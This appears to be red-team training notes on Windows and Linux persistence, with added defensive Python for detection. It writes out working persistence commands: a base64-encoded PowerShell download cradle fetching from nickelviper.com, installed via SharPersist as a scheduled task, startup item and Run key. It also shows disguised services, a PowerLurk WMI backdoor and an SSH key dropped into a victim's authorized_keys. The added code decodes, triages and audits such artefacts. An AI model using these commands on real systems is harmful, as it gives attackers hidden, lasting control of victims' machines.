  • HKCU / HKLM Registry Autoruns
  • Scheduled Tasks
  • Startup Folder

Current User Persistence

Task Scheduler

The Windows Task Scheduler allows us to create “tasks” that execute on a pre-determined trigger. That trigger could be a time of day, on user-logon, when the computer goes idle, when the computer is locked, or a combination thereof.

Let’s create a scheduled task that will execute a PowerShell payload once every hour. To avoid dealing with nested quotation marks in the IEX cradle, we can encode it as base64 and execute it with PowerShell’s -EncodedCommand parameter (often abbreviated to -enc). This is slightly fiddly because PowerShell expects the base64 to be over UTF-16LE bytes (what .NET calls “Unicode”), not UTF-8 or ASCII.

Creating payload

PowerShell:

$str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

Linux (fish shell):

ubuntu@DESKTOP-3BSK7NO ~> set str 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
ubuntu@DESKTOP-3BSK7NO ~> echo -en $str | iconv -t UTF-16LE | base64 -w 0
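As an added example (not part of the original notes and not from any tool shown on this page), the Python below performs the same encoding, shows why a UTF-8 encoding would not do, and decodes a blob back into its script, which is the step a defender needs when a task, Run value or service turns up with -enc on its command line. The command string and the base64 blob are the ones used on this page; the helper names are my own.

```python
import base64

# The cradle string and the -enc blob from the SharPersist command on this page;
# used here to check that the encoding round-trips exactly.
COMMAND = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PAGE_BLOB = (
    "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQA"
    "KQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUA"
    "bAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA"
)


def encode_command(command: str) -> str:
    """Build the argument for powershell.exe -EncodedCommand.

    PowerShell base64-decodes the argument and reads the bytes as UTF-16LE
    (the encoding .NET calls 'Unicode'), so that is what must be encoded.
    """
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def utf8_blob(command: str) -> str:
    """What you get by forgetting the UTF-16LE requirement: a different blob
    that PowerShell will not read back as the intended script."""
    return base64.b64encode(command.encode("utf-8")).decode("ascii")


def decode_command(blob: str) -> str:
    """Recover the script behind an -enc blob seen in a task action, a Run
    value or a service command line, so it can be read during triage."""
    return base64.b64decode(blob).decode("utf-16-le")


def is_utf16le_blob(blob: str) -> bool:
    """Cheap check for 'this base64 is an encoded PowerShell command': ASCII
    text in UTF-16LE has a 0x00 in every odd byte position."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return False
    return len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2])


if __name__ == "__main__":
    blob = encode_command(COMMAND)
    print("matches page blob:", blob == PAGE_BLOB)
    print("decoded:", decode_command(blob))
    print("utf-8 blob looks like an -enc payload:", is_utf16le_blob(utf8_blob(COMMAND)))
```

The odd-byte test in is_utf16le_blob is what makes encoded PowerShell easy to spot in command-line telemetry: a UTF-8 blob of the same text has an odd length and no zero bytes, so it fails the check.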

Exploitation of Scheduled Task

C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -n "Updater" -m add -o hourly

Where:

  • -t is the desired persistence technique.
  • -c is the command to execute.
  • -a are any arguments for that command.
  • -n is the name of the task.
  • -m is the mode: add the task (remove, check and list are also available).
  • -o is the task frequency.

Startup Folder

Applications, files and shortcuts within a user’s startup folder are launched automatically when they log in. It’s commonly used to bootstrap the user’s home environment (setting wallpapers, creating shortcuts, etc.).

beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -f "UserEnvSetup" -m add

Registry Autorun

AutoRun values in HKCU and HKLM allow applications to start on boot. You commonly see these used to start native and third-party applications such as software updaters, download assistants, driver utilities and so on.

beacon> cd C:\ProgramData
beacon> upload C:\Payloads\http_x64.exe
beacon> mv http_x64.exe updater.exe
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

Hunting for COM Hijacks

System User Persistence

There are many Windows services that run as SYSTEM. Our various means of exploiting services for privilege escalation also act as persistence, but at the cost of breaking the legitimate service. Instead, we can create our own service, which won’t impact existing services.

Windows Services

beacon> cd C:\Windows
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe legit-svc.exe

beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add
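The four mechanisms above (scheduled task, startup folder, Run key and service) all leave an entry whose command line can be collected and triaged the same way. The Python below is an added example, not part of these notes or of SharPersist: it takes constructed entries modelled on the commands on this page, decodes any -enc payload, and flags the indicators a hunter looks for. The AutorunEntry shape, the finding names and the path allow/deny lists are my own assumptions; on a live host the rows would be built from schtasks /query, the Run keys, the Startup folders and service ImagePath values.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class AutorunEntry:
    source: str        # schtask | startupfolder | hkcu_run | hklm_run | service
    name: str
    command_line: str  # task action, Run value data, shortcut target or ImagePath


# The -enc blob from the scheduled task on this page, reused as sample input.
PAGE_BLOB = (
    "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQA"
    "KQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUA"
    "bAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA"
)

# Constructed sample set: the three SharPersist artefacts from this page plus
# one benign-looking startup-folder item (a made-up product path).
SAMPLE_ENTRIES = [
    AutorunEntry("schtask", "Updater",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                 " -nop -w hidden -enc " + PAGE_BLOB),
    AutorunEntry("hkcu_run", "Updater", r"C:\ProgramData\Updater.exe /q /n"),
    AutorunEntry("service", "legit-svc", r"C:\Windows\legit-svc.exe"),
    AutorunEntry("startupfolder", "Example.lnk",
                 r'"C:\Program Files\Example\example.exe" --autostart'),
]

# Assumed location lists; tune them to the estate being hunted.
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\")
STANDARD = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
            "c:\\program files\\", "c:\\program files (x86)\\")

# Matches -e, -ec, -en, -enc, -encodedcommand (but not -ex/-exec, ExecutionPolicy).
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"invoke-expression|\biex\b", re.I)


def split_command_line(cmd: str) -> Tuple[str, str]:
    """Separate the executable from its arguments, honouring a quoted path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        if end == -1:
            return cmd[1:], ""
        return cmd[1:end], cmd[end + 1:].strip()
    exe, _, args = cmd.partition(" ")
    return exe, args


def triage(entry: AutorunEntry) -> List[str]:
    """Return the indicators found on one autorun entry, in a fixed order."""
    findings: List[str] = []
    exe, args = split_command_line(entry.command_line)
    path = exe.lower()
    if path.startswith(USER_WRITABLE):
        findings.append("user-writable-path")
    elif not path.startswith(STANDARD):
        findings.append("nonstandard-path")
    if path.rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe"):
        if re.search(r"(?:^|\s)-nop\w*", args, re.I):
            findings.append("no-profile")
        if re.search(r"(?:^|\s)-w\w*\s+hidden", args, re.I):
            findings.append("hidden-window")
        m = ENC_RE.search(args)
        if m:
            findings.append("encoded-command")
            try:
                # -enc payloads are base64 over UTF-16LE bytes
                script = base64.b64decode(m.group(1)).decode("utf-16-le")
            except ValueError:
                script = ""
            if CRADLE_RE.search(script):
                findings.append("download-cradle")
    return findings


def triage_all(entries: List[AutorunEntry]) -> Dict[str, List[str]]:
    return {f"{e.source}:{e.name}": triage(e) for e in entries}


if __name__ == "__main__":
    for key, hits in triage_all(SAMPLE_ENTRIES).items():
        print(f"{key:<28} {', '.join(hits) or 'nothing notable'}")
```

The path checks are deliberately coarse: plenty of legitimate software autoruns from user-writable directories, so they are a prompt to compare against a known-good baseline rather than a verdict. The decoded-script check is the one with real signal, since a hidden, profile-less PowerShell running a download cradle is rarely legitimate.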

WMI Event Subscription

Persistence via WMI events can be achieved by leveraging the following three classes:

  • EventConsumer
  • EventFilter
  • FilterToConsumerBinding

An EventConsumer is the action that we want to perform - in this case, executing a payload. This can be an OS command (such as a PowerShell one-liner) or VBScript.

An EventFilter is a trigger that we can act upon. Any arbitrary WMI query can be used as a filter, which gives practically unlimited options. These can include when a particular process starts, when a user logs in, when a USB device is inserted, a specific time of day, or a timed interval.

The FilterToConsumerBinding simply links an EventConsumer and EventFilter together.

PowerLurk is a PowerShell tool for building these WMI events.


beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe (payload)
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

You can view these classes afterwards with Get-WmiEvent -Name WmiBackdoor. The CommandLineTemplate of the EventConsumer will simply be C:\Windows\dns_x64.exe, and the query of the EventFilter will be SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'.

Open notepad on Workstation 2 and the DNS Beacon will appear.
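To make the three-class model concrete from the hunting side, the Python below is an added example (not from these notes and not from PowerLurk) that walks a set of root\subscription records exactly as a __FilterToConsumerBinding does: each binding is followed to its filter and consumer, and anything that runs a command or script is reported together with what fires it. The records are constructed to mirror the WmiBackdoor filter query and CommandLineTemplate quoted above, plus the SCM Event Log filter/consumer pair present on a default Windows install as a benign baseline; the finding names and trigger heuristics are my own assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample of root\subscription contents, shaped like the
# properties Get-WmiObject -Namespace root\subscription returns per class.
FILTERS = [
    {"Name": "SCM Event Log Filter", "QueryLanguage": "WQL",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"Name": "WmiBackdoor", "QueryLanguage": "WQL",
     "Query": "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"},
]
CONSUMERS = [
    {"__CLASS": "NTEventLogEventConsumer", "Name": "SCM Event Log Consumer"},
    {"__CLASS": "CommandLineEventConsumer", "Name": "WmiBackdoor",
     "CommandLineTemplate": r"C:\Windows\dns_x64.exe"},
]
BINDINGS = [
    {"Filter": '__EventFilter.Name="SCM Event Log Filter"',
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"'},
    {"Filter": '__EventFilter.Name="WmiBackdoor"',
     "Consumer": 'CommandLineEventConsumer.Name="WmiBackdoor"'},
]

# Binding references carry  Class.Name="value"  (possibly behind a namespace
# path); this pulls out the class and the key.
REF_RE = re.compile(r'(\w+)\.Name="([^"]*)"')

# Consumer classes that execute something, and the property holding what.
ACTIVE_CONSUMERS = {"CommandLineEventConsumer": "CommandLineTemplate",
                    "ActiveScriptEventConsumer": "ScriptText"}

# Query substrings that reveal the kind of trigger (assumed heuristics).
TRIGGER_HINTS = [
    ("Win32_ProcessStartTrace", "process-start"),
    ("Win32_LogonSession", "logon"),
    ("Win32_VolumeChangeEvent", "removable-media"),
    ("Win32_LocalTime", "timer"),
]

STANDARD = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\program files\\")


@dataclass
class Subscription:
    filter_name: str
    query: str
    consumer_class: str
    consumer_name: str
    action: str
    findings: List[str] = field(default_factory=list)


def resolve_bindings(filters: List[Dict[str, str]], consumers: List[Dict[str, str]],
                     bindings: List[Dict[str, str]]) -> List[Subscription]:
    """Follow each __FilterToConsumerBinding to its filter and consumer."""
    by_filter = {f["Name"]: f for f in filters}
    by_consumer = {(c["__CLASS"], c["Name"]): c for c in consumers}
    subs = []
    for b in bindings:
        fm, cm = REF_RE.search(b["Filter"]), REF_RE.search(b["Consumer"])
        if not fm or not cm:
            continue
        flt = by_filter.get(fm.group(2), {})
        cons = by_consumer.get((cm.group(1), cm.group(2)), {})
        sub = Subscription(
            filter_name=fm.group(2), query=flt.get("Query", ""),
            consumer_class=cm.group(1), consumer_name=cm.group(2),
            action=cons.get(ACTIVE_CONSUMERS.get(cm.group(1), ""), ""))
        if not flt or not cons:
            sub.findings.append("dangling-reference")
        subs.append(sub)
    return subs


def assess(sub: Subscription) -> Subscription:
    """Flag subscriptions that execute something and note what fires them."""
    if sub.consumer_class in ACTIVE_CONSUMERS:
        sub.findings.append("runs-command-or-script")
        for needle, label in TRIGGER_HINTS:
            if needle.lower() in sub.query.lower():
                sub.findings.append("trigger:" + label)
        if sub.consumer_class == "CommandLineEventConsumer":
            exe = sub.action.strip().strip('"').lower()
            if exe and not exe.startswith(STANDARD):
                sub.findings.append("nonstandard-action-path")
    return sub


def hunt(filters, consumers, bindings) -> List[Subscription]:
    return [assess(s) for s in resolve_bindings(filters, consumers, bindings)]


if __name__ == "__main__":
    for s in hunt(FILTERS, CONSUMERS, BINDINGS):
        print(f"{s.filter_name} -> {s.consumer_class}/{s.consumer_name}: "
              f"{', '.join(s.findings) or 'baseline'}")
```

Resolving through the binding rather than listing consumers alone matters because a consumer with no binding never fires, and a binding pointing at a missing filter or consumer (the dangling-reference case) is itself a sign that something was half-removed.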

Linux

SSH persistence

On the client machine

ssh-keygen

On the victim machine

echo "ssh-rsa AAAAB3NzaC1yc2E....ANSzp9EPhk4cIeX8= kali@kali" >> /home/linuxvictim/.ssh/authorized_keys

On the client machine

ssh linuxvictim@linuxvictim
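The defensive counterpart to the key drop above is a periodic audit of authorized_keys against the fingerprints an organisation actually issued. The Python below is an added example, not part of these notes: it parses authorized_keys lines (including leading options such as from= and command=), computes the SHA256 fingerprint in the form ssh-keygen -lf prints, checks that the type declared on the line matches the type recorded inside the key blob, and reports anything outside the baseline. The file contents and key blobs are constructed fixtures (the blobs are correctly shaped ssh-ed25519 keys around dummy bytes, not real keys); the finding names are my own.

```python
import base64
import hashlib
import re
import struct
from dataclasses import dataclass, field
from typing import List, Optional, Set


def _ssh_string(data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + data


def make_ed25519_blob(point: bytes) -> str:
    """Constructed fixture: a wire-format ssh-ed25519 public key around an
    arbitrary 32-byte value. It is only shaped like a key, it is not one."""
    return base64.b64encode(_ssh_string(b"ssh-ed25519") + _ssh_string(point)).decode("ascii")


KNOWN_BLOB = make_ed25519_blob(bytes(32))
ROGUE_BLOB = make_ed25519_blob(bytes(range(32)))

# Constructed authorized_keys content: a key the team issued, the same key
# with restrictions, a key nobody recognises, a line whose declared type does
# not match the blob, and a line that is not a key at all.
SAMPLE_AUTHORIZED_KEYS = f"""# managed by config management
ssh-ed25519 {KNOWN_BLOB} admin@bastion
from="10.0.0.0/8",command="/usr/bin/backup" ssh-ed25519 {KNOWN_BLOB} backup@host
ssh-ed25519 {ROGUE_BLOB} kali@kali
ssh-rsa {ROGUE_BLOB} mismatch@example
ssh-ed25519 not*base64*at*all bad@example
"""

# options (optional), key type, base64 blob, comment (optional)
KEY_RE = re.compile(
    r"^(?:(?P<opts>.*?)\s+)?"
    r"(?P<type>ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp(?:256|384|521)|sk-\S+)\s+"
    r"(?P<blob>\S+)(?:\s+(?P<comment>.*))?$")


@dataclass
class AuthorizedKey:
    line_no: int
    options: str
    key_type: str
    fingerprint: str
    comment: str
    problems: List[str] = field(default_factory=list)


def fingerprint(blob_b64: str) -> str:
    """SHA256 fingerprint in the form ssh-keygen -lf prints it."""
    digest = hashlib.sha256(base64.b64decode(blob_b64, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def embedded_type(blob_b64: str) -> Optional[str]:
    """The key type recorded inside the blob (its first length-prefixed string)."""
    raw = base64.b64decode(blob_b64, validate=True)
    if len(raw) < 4:
        return None
    (n,) = struct.unpack(">I", raw[:4])
    return raw[4:4 + n].decode("ascii", errors="replace") if len(raw) >= 4 + n else None


def audit(text: str, baseline: Set[str]) -> List[AuthorizedKey]:
    """Parse authorized_keys text and flag anything outside the fingerprint baseline."""
    results = []
    for line_no, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.match(line)
        if not m:
            results.append(AuthorizedKey(line_no, "", "", "", "", ["unparseable-line"]))
            continue
        key = AuthorizedKey(line_no, m["opts"] or "", m["type"], "", m["comment"] or "")
        try:
            key.fingerprint = fingerprint(m["blob"])
        except ValueError:
            key.problems.append("malformed-key")
            results.append(key)
            continue
        if key.fingerprint not in baseline:
            key.problems.append("unknown-fingerprint")
        if embedded_type(m["blob"]) != key.key_type:
            key.problems.append("type-mismatch")
        results.append(key)
    return results


BASELINE = {fingerprint(KNOWN_BLOB)}

if __name__ == "__main__":
    for k in audit(SAMPLE_AUTHORIZED_KEYS, BASELINE):
        print(f"line {k.line_no}: {k.key_type} {k.fingerprint} {k.comment!r} "
              f"{', '.join(k.problems) or 'ok'}")
```

Keying the baseline on fingerprints rather than on comments is the point: the comment field is free text that the person adding the key controls, so a key labelled like an existing administrator's is caught only by the fingerprint comparison.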